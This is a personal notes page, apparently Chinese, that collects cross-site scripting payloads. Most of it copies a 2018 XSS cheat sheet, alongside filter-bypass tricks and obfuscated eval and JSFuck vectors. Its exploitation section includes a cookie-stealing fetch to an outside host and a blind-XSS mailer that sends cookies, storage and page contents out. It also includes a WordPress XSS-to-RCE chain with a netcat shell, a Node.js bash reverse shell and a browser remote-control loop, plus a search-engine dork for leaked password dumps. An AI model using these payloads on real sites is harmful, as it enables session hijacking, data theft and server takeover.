xss注入
Reflected XSS
Persistent XSS
DOM-based XSS
Mutation XSS
Universal Cross-site Scripting (UXSS)
通用跨站脚本攻击(UXSS)
<marquee>Mannix</marquee>
">"><script>with(document)alert(cookie)</script><"<"
javascript关键字过滤 +加号过滤
# document.cookie
document['coo'['CONCAT'.toLowerCase()]('kie')]
<script>alert(document['coo'['CONCAT'.toLowerCase()]('kie')])</script>
<script>alert(document['dom'['CONCAT'.toLowerCase()]('ain')])</script>
圆括号过滤
# alert(1)
alert`1`
;分号过滤
<img src=1 onerror=alert(1)>
单、双、反引号过滤
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//
<script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//</script>
.过滤
with(location)alert(hash)
<script>with(location)alert(hash)</script>
<script>with(document)alert(cookie)</script>
html标签过滤、属性名过滤
<video width="0" height="0" oncanplay=alert`0`>
<source src="http://www.runoob.com/try/demo_source/mov_bbb.mp4" type="video/mp4"></video>
<details ontoggle=alert(1) open>
<marquee onscroll=alert(document.domain)>
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
过滤alert
<script>window['alert'](1)</script>
<script>window['ale'+'rt'](1)</script>
<script>window["alert"](1)</script>
<script>window[`alert`](1)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](1)</script>
<script>top['alert'](1)</script>
<script>frames['alert'](1)</script>
<script>self.frames['alert'](1)</script>
<script>self.parent['alert'](1)</script>
<script>self.top['alert'](1)</script>
top['aler'+'t'](1)
[1].find(confirm)
[1].map(confirm)
[1].some(confirm)
[1].every(confirm)
[1].filter(confirm)
[1].findIndex(confirm)
[1].map(alert)
[1].find(alert)
[1].every(alert)
[1].filter(alert)
[1].findIndex(alert)
[1].some(alert)
<script>[document.cookie].map(alert)</script>
<script>[1].map(alert)</script>
alert(document.domain)
YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==
<svg onload=eval(atob`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`)>
<svg onload=eval(atob`YWxlcnQoMSk=`)>
<svg onload=setTimeout(atob`YWxlcnQoMSk=`)>
<svg onload=setInterval(atob`YWxlcnQoMSk=`)>
<svg onload='new Function(atob`YWxlcnQoMSk=`)()'>
<svg onload=self[`ev`+`al`](atob`YWxlcnQoMSk=`)>
<script>document.write("<s","crip","t>al","ert(","1)","</s","cript>")</script>
<script>atob.constructor(atob`YWxlcnQoMSk`)``</script>
<script>atob.constructor(atob(/YWxlcnQoMSk/.source))()</script>
<script>window[Symbol.hasInstance]=eval
atob`YWxlcnQoMSk` instanceof window</script>
<script>atob.constructor(unescape([...escape((𐑬󠅯󠅣󠅡󠅴󠅩󠅯󠅮󠄽󠄧󠅨󠅴󠅴󠅰󠄺󠄯󠄯󠅩󠅢󠅭󠄮󠅣󠅯󠅭󠄧=ᅠ=>ᅠ).name)].filter((ᅠ,ㅤ)=>ㅤ%12<1|ㅤ%12>9).join([])))()</script>
右下角或者左上角弹窗
<script>Notification.requestPermission(x=>{new(Notification)(document.cookie)})</script>
<script>Notification.requestPermission(x=>{new(Notification)(1)})</script>
XSS Cheat Sheet
2018 Edition
Start to master the fine art of Cross-Site Scripting (XSS) right now!
LAST UPDATED ON 2018-01-29
XSS Cheat Sheet 2018 Edition is a booklet on Cross-Site Scripting (XSS), the most widespread and common flaw found in the World Wide Web. It was designed to be a quick reference material to deal with XSS related needs for bug hunters, penetration testers, security analysts, web application security students and enthusiasts.
bitcoin:34RPK3S3K8fnja4mKWhC9ms1QCMyjxA6tf?amount=0.001
https://leanpub.com/xss
https://leanpub.com/cart_purchases/vwC-6u7xSmMwkJh6Vyuefg/thankyou
https://leanpub.com/s/rIvdFQMm3wDthqgfxYGo7g.pdf
Basics
HTML Context – Simple Tag Injection
<svg onload=alert(1)>
"><svg onload=alert(1)><"
HTML Context – In Block Tag Injection
<title><style><script><textarea><noscript><pre><xmp><iframe>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)><"
HTML Context – Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
HTML Context – Source Injection
href, src, data
,action,formaction
data:,alert(1)
javascript:alert(1)
data:text/html,<svg onload=alert(1)>
Javascript Context – Code Injection
'-alert(1)-'
'-alert(1)//
连接符号:
+(%2b) - * / % ^ < > <= >= == === != !== ; | %0a %0A %0d %0D %0a%0d %0A%0D //
http://t.mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
http://t.mhz.pw/game/xss/scriptstr.php?xss='|alert(1)|'
<script type="text/javascript">
var a = ''|alert(1)|'';
</script>
Javascript Context – Code Injection with Escape Bypass
\'-alert(1)//
Javascript Context – Code Injection in Logical Block
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
Javascript Context – Tag Injection
</script><svg onload=alert(1)>
Advanced
Multi Reflection – Double Reflection (Single Input)
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
Multi Reflection – Triple Reflection (Single Input)
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
Multi Input Reflections (Double & Triple)
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
File Upload Injection – Filename
"><svg onload=alert(1)>.gif
File Upload Injection – Metadata
exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
File Upload Injection – SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
DOM Insert Injection
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
DOM Insert Injection – Resource Request
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
PHP_SELF Injection
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
Script Injection – No Closing
<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
Javascript postMessage() DOM Injection (with Iframe)
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
XML-based XSS
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/>
Client Side Template Injection
{{32*32}}
AngularJS Injections (v1.6 and up)
{{constructor.constructor('alert(1)')()}}
<x ng-app>{{constructor.constructor('alert(1)')()}}
CRLF Injection
%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A
%3Cscript%3Ealert(1)%3C/script%3E
%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection
%3a0%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E
Filter Bypass
Mixed Case XSS
<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>
Unclosed Tags
<svg onload=alert(1)//
<svg onload="alert(1)"
Uppercase XSS
<SVG ONLOAD=alert(1)>
<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
Extra Content for Script Tags
<script/x>alert(1)</script>
Double Encoded XSS
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
Alert without Parentheses (Strings Only)
alert`1`
Alert without Parentheses
setInterval`alert\x28document.domain\x29`
setTimeout`alert\x28document.domain\x29`
Alert without Parentheses (Tag Exclusive)
<svg onload=alert(1)>
<svg onload=alert(1)>
Alert without Alphabetic Chars
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
Alert Obfuscation
top window parent self this frames
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
File Upload Injection – HTML/js GIF Disguise
GIF89a=//<script>
alert(1)//</script>;
Jump to URL Fragment
eval(URL.slice(-8)) #alert(1)
eval(location.hash.slice(1)) #alert(1)
document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>
* (Webkit only)
<svg/onload=innerHTML=location.hash> #<img/src/onerror=alert(1)>
HTML Alternative Separators
Tag Scheme:
<name [1] attrib [2] = [3] value [4] handler [5] = [6] js [7]>
[1], [2], [5] => %09, %0A, %0C, %0D, %20, / and +
[3] & [4] => %09, %0A, %0C, %0D, %20, + and ' or " in both
[6] & [7] => %09, %0A, %0B, %0C, %0D, %20, /, + and ' or " in both
Strip Tags Based Bypass
"o<x>nmouseover=alert<x>(1)//
"autof<x>ocus o<x>nfocus=alert<x>(1)//
2nd Order XSS Injection
<svg/onload=alert(1)>
Event Origin Bypass for postMessage() XSS
http://facebook.com.localhost/crosspwn.php?
target=//brutelogic.com.br/tests/status.html&msg=<script>alert(1)</script>
CSP Bypass (for Whitelisted Google Domains)
<script src=https://www.google.com/complete/search?client=chrome
%26jsonp=alert(1);></script>
<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
</script><x ng-app ng-csp>{{constructor.constructor('alert(1)')()}}
Vectors without Event Handlers
<script>alert(1)</script>
<script src=data:,alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
Vectors with Agnostic Event Handlers
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
Javascript Alternative Comments
<!--
%0A-->
Exploitation
Remote Script Call
1. HTML-based (response must be HTML with an Access-Control-Allow-Origin
(CORS) header)
"var x=new XMLHttpRequest();x.open('GET','//brutelogic.com.br/0.php');x.send();
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"
fetch('//brutelogic.com.br/0.php').then(function(r){r.text().then(function(w)
{write(w)})})
* (with fully loaded JQuery library)
$.get('//brutelogic.com.br/0.php',function(r){write(r)})
2. Javascript-based (response must be javascript)
* (with fully loaded JQuery library)
$.getScript('//brutelogic.com.br/2.js')
Wordpress XSS to RCE (up to v4.9.1)
p = '/wordpress/wp-admin/plugin-editor.php?';
q = 'file=hello.php';
s = '<?=`nc localhost 5855 -e /bin/bash`;';
a = new XMLHttpRequest();
a.open('GET', p+q, 0);
a.send();
$ = '_wpnonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] +
'&newcontent=' + s + '&action=update&' + q;
b = new XMLHttpRequest();
b.open('POST', p+q, 1);
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.send($);
b.onreadystatechange = function(){
if (this.readyState == 4) {
fetch('/wordpress/wp-content/plugins/hello.php');
}
}
Blind XSS Mailer
<?php header("Content-type: application/javascript"); ?>
var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] .
$_SERVER["REQUEST_URI"] ?>';
var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' +
document.URL;
msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE
COOKIES\n' + document.cookie;
msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) +
'\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;
var r = new XMLHttpRequest();
r.open('POST', mailer, true);
r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
r.send('origin=' + document.location.origin + '&msg=' +
encodeURIComponent(msg));
<?php
header("Access-Control-Allow-Origin: " . $_POST["origin"]);
$origin = $_POST["origin"];
$to = "myName@myDomain";
$subject = "XSS Blind Report for " . $origin;
$ip = "Requester: " . $_SERVER["REMOTE_ADDR"] . "\nForwarded For: ".
$_SERVER["HTTP_X_FORWARDED_FOR"];
$msg = $subject . "\n\nIP ADDRESS\n" . $ip . "\n\n" . $_POST["msg"];
$headers = "From: report@myDomain" . "\r\n";
if ($origin && $msg) {
mail($to, $subject, $msg, $headers);
}
?>
Invisible Foreign XSS Embedding
<iframe src="//brutelogic.com.br/xss.php?a=<svg onload=alert(document.domain)>"
style=display:none></iframe>
Cookie Stealing
fetch('//brutelogic.com.br/?c='+document.cookie)
Simple Virtual Defacement
<svg onload="documentElement.innerHTML='<h1>Not Found</h1>'">
Browser Remote Control
Javascript:
setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:5855'},100)
Listener:
brute@logic:~$ while :; do printf "j$ "; read c; echo $c | nc -lp 5855 >/dev/null; done
Miscellaneous
XSS Online Test Page
https://brutelogic.com.br/xss.php
Multi-Case Filter-Aware HTML Injection
'"</Script><Html /Onmouseover=(alert)(1) //
Javascript Execution Delay
onload=function(){$.getScript('//brutelogic.com.br/2.js')}
onload=x=>$.getScript('//brutelogic.com.br/2.js')
Valid Source for Image Tags
<img
src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=
onload=alert(1)>
Shortest XSS
<base href=//knoxss.me>
Mobile-only Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<body onorientationchange=alert(1)>
Body Tag
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=%23x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1!
Less Known XSS Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Cross-Origin Script (Crosspwn)
http://facebook.com.localhost/crosspwn.php?
target=//brutelogic.com.br/tests/status.html&msg=<script>alert(document.domain)
Where “facebook.com” is an allowed origin and “localhost” is attacking domain,
“//brutelogic.com.br/tests/status.html” is target page and
“<script>alert(document.domain)” is message sent.
http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?
a=<body/onresize=alert(document.domain)>
http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?
a=<svg/onload=eval(name)>&name=alert(document.domain)
<!DOCTYPE html>
<body onload="crossPwn()">
<h2>CrossPwn</h2>
<iframe src="<?php echo htmlentities($_GET['target'], ENT_QUOTES) ?>"
name="<?php echo $_GET['name'] ?>" height="0"
style="visibility:hidden"></iframe>
<script>
function crossPwn() {
frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage
document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); //
onresize
document.getElementsByTagName('iframe')[0].src = '<?php echo
$_GET["target"] ?>' + '#brute'; // onhashchange
}
</script>
</body>
</html>
Simple XSS Finder Script for PHP (Static Analysis)
if [ -z $1 ]
then
echo -e "Usage:\n$0 FILE\n$0 -r FOLDER"
exit
else
f=$1
fi
sources=(GET POST REQUEST "SERVER\['PHP" "SERVER\['PATH_" "SERVER\
['REQUEST_U")
sinks=(? echo die print printf print_r var_dump)
xssam(){
for i in ${sources[@]}
do
a=$(grep -in "\$_${i}" $f | grep -o "\$.*=" | sed "s/[ ]\?=//g" | sort -u)
for j in ${sinks[@]}
do
grep --color -in "${j}.*\$_${i}" $f
for k in $a
do
grep --color -in "${j}.*$k" $f
done
done
done
}
if [ $f != "-r" ]
then
xssam
else
for i in $(find $2 -type f -name "*.php")
do
echo "File: $i"
f=$i
xssam
done
fi
Node.js RCE
Javascript:
require('child_process').exec('bash -c "bash -i >& /dev/tcp/HOST/5855 0>&1"')
nc -lp 5855
ASCII Encoding Table
Remember to replace “&” and “#” in URLs
with their encoded version (%26 and %23 respectively).
<iframe srcdoc="<script>alert(document.domain)</script>">
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
'"()%26%25<acx><ScRiPt >prompt(931289)</ScRiPt>
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E
'"()%26%25<acx><ScRiPt >prompt(973761)</ScRiPt>
<script x>
<script x>alert('XSS')<script y>
<test haha=x >
<test onxxx=xxxx>
<svg onxxx=xxx>, <marquee onxxx=xxx>, <audio onxxx=xxx>
<x oncopy=alert('XSS')>copy this
<haha onclick=alert('XSS')>click here
<svg onload=alert('XSS')>
<marquee onstart=alert('XSS')>
alert() prompt() confirm()
alert`` prompt`` confirm``
(alert)`` (prompt)`` (confirm)``
[8].some(alert) (((prompt)))`` co\u006efirm
<audio src=//14.rs>
https://xsshunter.com/features
https://github.com/ssl/ezXSS
https://github.com/LewisArdern/bXSS
https://knoxss.me/?page_id=2
eval(new class extends String{}('alert')+new class extends String{}('(1)'))
<script type="text/javascript">
eval(new class extends String{}('alert')+new class extends String{}('(1)'))
</script>
filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES
更新一句([,_____,,,,___]=(__=[])+{_:__},[______,_,________,____,,_________,_______,__,,,__________]=[!!_____]+!_____+_____._____)[___+=_____+__________+__+______+_+________+___+______+_____+_][___](_________+_______+____+_+______+'(-~_)')()
<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])</script>
<script>
document.getElementsByName("masked")[0].value="<h1 onmousemove=alert(1)>"+"B".repeat(20000)
document.forms[0].submit();
</script>
浙公网安备 33010602011771号